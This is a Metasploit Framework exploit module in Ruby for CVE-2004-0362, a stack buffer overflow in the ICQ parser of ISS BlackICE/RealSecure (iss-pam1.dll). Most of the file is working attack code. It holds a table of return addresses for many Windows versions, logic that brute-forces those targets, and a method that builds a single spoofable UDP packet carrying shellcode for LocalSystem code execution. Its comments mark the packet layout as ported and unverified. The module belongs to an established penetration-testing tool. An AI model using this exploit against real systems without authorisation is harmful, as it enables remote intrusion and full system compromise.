GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/firewall/blackice_pam_icq.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
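class MetasploitModule < Msf::Exploit::Remote
  # CVE-2004-0362: stack buffer overflow in the ICQ parser of iss-pam1.dll
  # (ISS BlackICE / RealSecure).  Per the module description the PAM engine
  # reaches the vulnerable parser from a single UDP datagram, which is why
  # RPORT uses a "pick a random port" sentinel (see #exploit) and why the
  # run can be repeated: the ISS exception handler restarts the process after
  # each overflow, so the return-address table below is bruteforceable.
  Rank = GreatRanking

  include Msf::Exploit::Remote::Udp

  # Module metadata, payload constraints and the return-address table.
  #
  # Targets 0..2 are bruteforce meta-targets.  A 'Targets' key holds the index
  # range into this same table that the meta-target iterates over; the bare
  # 'Bruteforce' entry walks every concrete (non-Brute) target.
  #
  # NOTE(review): the concrete entries are spelled 'iis-pam1.dll' although the
  # library is iss-pam1.dll, and the 'Bruteforce NT 4.0' range 5..15 also
  # covers the WinXP entries (10..14) and 'Windows 2000 Pro SP4 English' (15).
  # Both are left as-is: users and scripts select targets by name/index.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ISS PAM.dll ICQ Parser Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the ISS products that use
        the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
        will result in arbitrary code execution as LocalSystem. This exploit
        only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
        address.

        The ISS exception handler will recover the process after each overflow, giving
        us the ability to bruteforce the service and exploit it multiple times.
      },
      'Author'         => 'spoonm',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2004-0362'],
          ['OSVDB', '4355'],
          ['URL', 'http://www.eeye.com/html/Research/Advisories/AD20040318.html']
        ],
      'Payload'        =>
        {
          # 504-byte email field minus the 19-byte filler, the 4-byte return
          # address and a small tail (ported from msf 2 -- confirm before
          # changing).  No NOP sled: the payload is placed directly.
          'Space'           => 504-31-4,
          'BadChars'        => "\x00",
          'MinNops'         => 0,
          'MaxNops'         => 0,
          'StackAdjustment' => -3500
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Bruteforce', { } ],
          [ 'Bruteforce iis-pam1.dll', { 'Targets' => 3 .. 4 } ],
          [ 'Bruteforce NT 4.0', { 'Targets' => 5 .. 15 } ],
          [ 'iis-pam1.dll 3.6.06', { 'Ret' => 0x5e0a47ef } ],
          [ 'iis-pam1.dll 3.6.11', { 'Ret' => 0x5e0da1db } ],
          [ 'WinNT SP3/SP4/SP5', { 'Ret' => 0x777e79ab } ],
          [ 'WinNT SP4/SP5', { 'Ret' => 0x7733b8db } ],
          [ 'WinNT SP5/SP6 - advapi32', { 'Ret' => 0x77dcd1cb } ],
          [ 'WinNT SP3/SP5/SP6 - shell32', { 'Ret' => 0x77cec080 } ],
          [ 'WinNT SP5/SP6 - mswsock', { 'Ret' => 0x7767ebca } ],
          [ 'WinXP SP0/SP1 - shell32', { 'Ret' => 0x776606af } ],
          [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76b305a7 } ],
          [ 'WinXP SP0/SP1 - atl', { 'Ret' => 0x76e61a21 } ],
          [ 'WinXP SP0/SP1 - ws2_32', { 'Ret' => 0x71ab7bfb } ],
          [ 'WinXP SP0/SP1 - mswsock', { 'Ret' => 0x71a5403d } ],
          [ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
          [ 'Win2000 SP0 - SP4', { 'Ret' => 0x750231e2 } ],
          [ 'Win2000 SP2/SP3 - samlib', { 'Ret' => 0x75159da3 } ],
          [ 'Win2000 SP0/SP1 - activeds', { 'Ret' => 0x77ed0beb } ],
          [ 'Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b } ],
          [ 'Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 } ],
          [ 'WinXP SP0 - SP1', { 'Ret' => 0x71aa3a4b } ],
          [ 'Win2003 SP0', { 'Ret' => 0x71bf3cc9 } ],
        ],
      'DisclosureDate' => '2004-03-18',
      'DefaultTarget'  => 0))

    # RPORT == 1 is a sentinel meaning "choose a random destination port"
    # (resolved in #exploit); any other value is used verbatim.
    register_options(
      [
        Opt::RPORT(1)
      ])
  end

  # Send the overflow datagram once per selected target, pausing between
  # attempts so the ISS exception handler has time to restart the service.
  #
  # Side effect: when RPORT is still the sentinel value 1, a random port in
  # 1..65535 is chosen and written back into the datastore, so it persists for
  # subsequent runs of this module instance until RPORT is reset.
  def exploit
    # rand(65536) could yield 0, which is not a usable UDP destination port;
    # draw from 1..65535 instead.
    datastore['RPORT'] = rand(1..65535) if rport == 1

    selected_targets.each do |targ|
      print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

      packet = icq_overflow_packet(targ.ret)

      print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

      # Fixed source port 4000 -- the ICQ server port.  Presumably the PAM
      # ICQ parser keys on it to classify the datagram; confirm against the
      # eEye advisory before changing.
      connect_udp(true, { 'CPORT' => 4000 })
      udp_sock.put(packet)
      disconnect_udp

      print_status("Sleeping (giving exception handler time to recover)")

      # Kernel#select with no descriptors is a plain 5-second sleep.
      select(nil, nil, nil, 5)
    end
  end

  private

  # Resolve the chosen target into the list of concrete targets to try.
  #
  # A meta-target with a 'Targets' index range expands to those table entries
  # (unknown indices are dropped rather than crashing on a nil target); the
  # bare 'Bruteforce' target expands to every non-bruteforce entry.  Any other
  # target is tried on its own.
  def selected_targets
    return [target] unless target.name =~ /^Brute/

    if target['Targets']
      target['Targets'].map { |idx| targets[idx] }.compact
    else
      targets.reject { |t| t.name =~ /^Brute/ }
    end
  end

  # Build the ICQ datagram carrying the overflow for return address +ret+.
  #
  # The encoded payload is padded with random printable text up to the
  # available payload space; the overflowing "email" field is 19 bytes of
  # filler, the little-endian return address, then the shellcode.
  #
  # The structure (SRV_MULTI wrapping SRV_USER_ONLINE and SRV_META_USER) was
  # ported from msf 2 -- "Hopefully this structure is correct ... Blame me
  # (skape) if it doesn't work!" -- so treat the field layout as unverified.
  def icq_overflow_packet(ret)
    shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)
    email = rand_text_english(19) + [ret].pack('V') + shellcode

    # SRV_MULTI
    [5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') +
      # SRV_USER_ONLINE
      [5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +
      [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +
      # SRV_META_USER
      [5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +
      "\x00\x00\x0a" + # subcommand / success
      "\x00\x00" +     # nick length / nick
      "\x00\x00" +     # first length / first
      "\x00\x00" +     # last length / last
      [email.length].pack('v') + email +
      "\x00\x00\x00\x00\x00\x00\x00"
  end
end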